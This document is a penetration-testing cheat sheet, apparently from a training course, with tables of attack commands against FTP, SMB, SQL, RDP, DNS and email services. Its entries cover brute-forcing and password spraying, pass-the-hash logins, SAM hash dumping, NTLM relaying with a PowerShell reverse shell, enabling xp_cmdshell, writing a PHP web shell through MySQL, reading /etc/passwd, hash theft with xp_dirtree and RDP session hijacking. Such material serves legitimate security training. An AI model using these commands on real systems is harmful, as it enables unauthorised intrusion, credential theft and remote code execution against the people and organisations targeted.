4 min read
Attacking FTP
Command | Description |
ftp | Connecting to the FTP server using the ftp client. |
nc -v 21 | Connecting to the FTP server using netcat . |
hydra -l user1 -P /usr/share/wordlists/rockyou.txt | Brute-forcing the FTP service. |
Attacking SMB
Command | Description |
smbclient -N -L // | Null-session testing against the SMB service. |
smbmap -H | Network share enumeration using smbmap . |
smbmap -H -r notes | Recursive network share enumeration using smbmap . |
smbmap -H --download "notes\note.txt" | Download a specific file from the shared folder. |
smbmap -H --upload test.txt "notes\test.txt" | Upload a specific file to the shared folder. |
rpcclient -U'%' | Null-session with the rpcclient . |
./enum4linux-ng.py -A -C | Automated enumeratition of the SMB service using enum4linux-ng . |
crackmapexec smb -u /tmp/userlist.txt -p 'Company01!' | Password spraying against different users from a list. |
impacket-psexec administrator:'Password123!'@ | Connect to the SMB service using the impacket-psexec . |
crackmapexec smb -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec | Execute a command over the SMB service using crackmapexec . |
crackmapexec smb -u administrator -p 'Password123!' --loggedon-users | Enumerating Logged-on users. |
crackmapexec smb -u administrator -p 'Password123!' --sam | Extract hashes from the SAM database. |
crackmapexec smb -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE | Use the Pass-The-Hash technique to authenticate on the target host. |
impacket-ntlmrelayx --no-http-server -smb2support -t | Dump the SAM database using impacket-ntlmrelayx . |
impacket-ntlmrelayx --no-http-server -smb2support -t -c 'powershell -e <base64 reverse shell> | Execute a PowerShell based reverse shell using impacket-ntlmrelayx . |
Attacking SQL Databases
Command | Description |
mysql -u julio -pPassword123 -h | Connecting to the MySQL server. |
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 | Connecting to the MSSQL server. |
sqsh -S -U julio -P 'MyPassword!' -h | Connecting to the MSSQL server from Linux. |
sqsh -S -U .\\julio -P 'MyPassword!' -h | Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server. |
mysql> SHOW DATABASES; | Show all available databases in MySQL. |
mysql> USE htbusers; | Select a specific database in MySQL. |
mysql> SHOW TABLES; | Show all available tables in the selected database in MySQL. |
mysql> SELECT * FROM users; | Select all available entries from the “users” table in MySQL. |
sqlcmd> SELECT name FROM master.dbo.sysdatabases | Show all available databases in MSSQL. |
sqlcmd> USE htbusers | Select a specific database in MSSQL. |
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES | Show all available tables in the selected database in MSSQL. |
sqlcmd> SELECT * FROM users | Select all available entries from the “users” table in MSSQL. |
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 | To allow advanced options to be changed. |
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 | To enable the xp_cmdshell. |
sqlcmd> RECONFIGURE | To be used after each sp_configure command to apply the changes. |
sqlcmd> xp_cmdshell 'whoami' | Execute a system command from MSSQL server. |
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php' | Create a file using MySQL. |
mysql> show variables like "secure_file_priv"; | Check if the the secure file privileges are empty to read locally stored files on the system. |
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents | Read local files in MSSQL. |
mysql> select LOAD_FILE("/etc/passwd"); | Read local files in MySQL. |
sqlcmd> EXEC master..xp_dirtree '\\\share\' | Hash stealing using the xp_dirtree command in MSSQL. |
sqlcmd> EXEC master..xp_subdirs '\\\share\' | Hash stealing using the xp_subdirs command in MSSQL. |
sqlcmd> SELECT srvname, isremote FROM sysservers | Identify linked servers in MSSQL. |
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [\SQLEXPRESS] | Identify the user and its privileges used for the remote connection in MSSQL. |
Attacking RDP
Command | Description |
crowbar -b rdp -s -U users.txt -c 'password123' | Password spraying against the RDP service. |
hydra -L usernames.txt -p 'password123' rdp | Brute-forcing the RDP service. |
rdesktop -u admin -p password123 | Connect to the RDP service using rdesktop in Linux. |
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} | Impersonate a user without its password. |
net start sessionhijack | Execute the RDP session hijack. |
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable “Restricted Admin Mode” on the target Windows host. |
xfreerdp /v: /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA | Use the Pass-The-Hash technique to login on the target host without a password. |
Attacking DNS
Command | Description |
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb | Perform an AXFR zone transfer attempt against a specific name server. |
subfinder -d inlanefreight.com -v | Brute-forcing subdomains. |
host support.inlanefreight.com | DNS lookup for the specified subdomain. |
Attacking Email Services
Command | Description |
host -t MX microsoft.com | DNS lookup for mail servers for the specified domain. |
dig mx inlanefreight.com | grep "MX" | grep -v ";" | DNS lookup for mail servers for the specified domain. |
host -t A mail1.inlanefreight.htb. | DNS lookup of the IPv4 address for the specified subdomain. |
telnet 25 | Connect to the SMTP server. |
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t | SMTP user enumeration using the RCPT command against the specified host. |
python3 o365spray.py --validate --domain msplaintext.xyz | Verify the usage of Office365 for the specified domain. |
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz | Enumerate existing users using Office365 on the specified domain. |
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz | Password spraying against a list of users that use Office365 for the specified domain. |
hydra -L users.txt -p 'Company01!' -f pop3 | Brute-forcing the POP3 service. |
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server | Testing the SMTP service for the open-relay vulnerability. |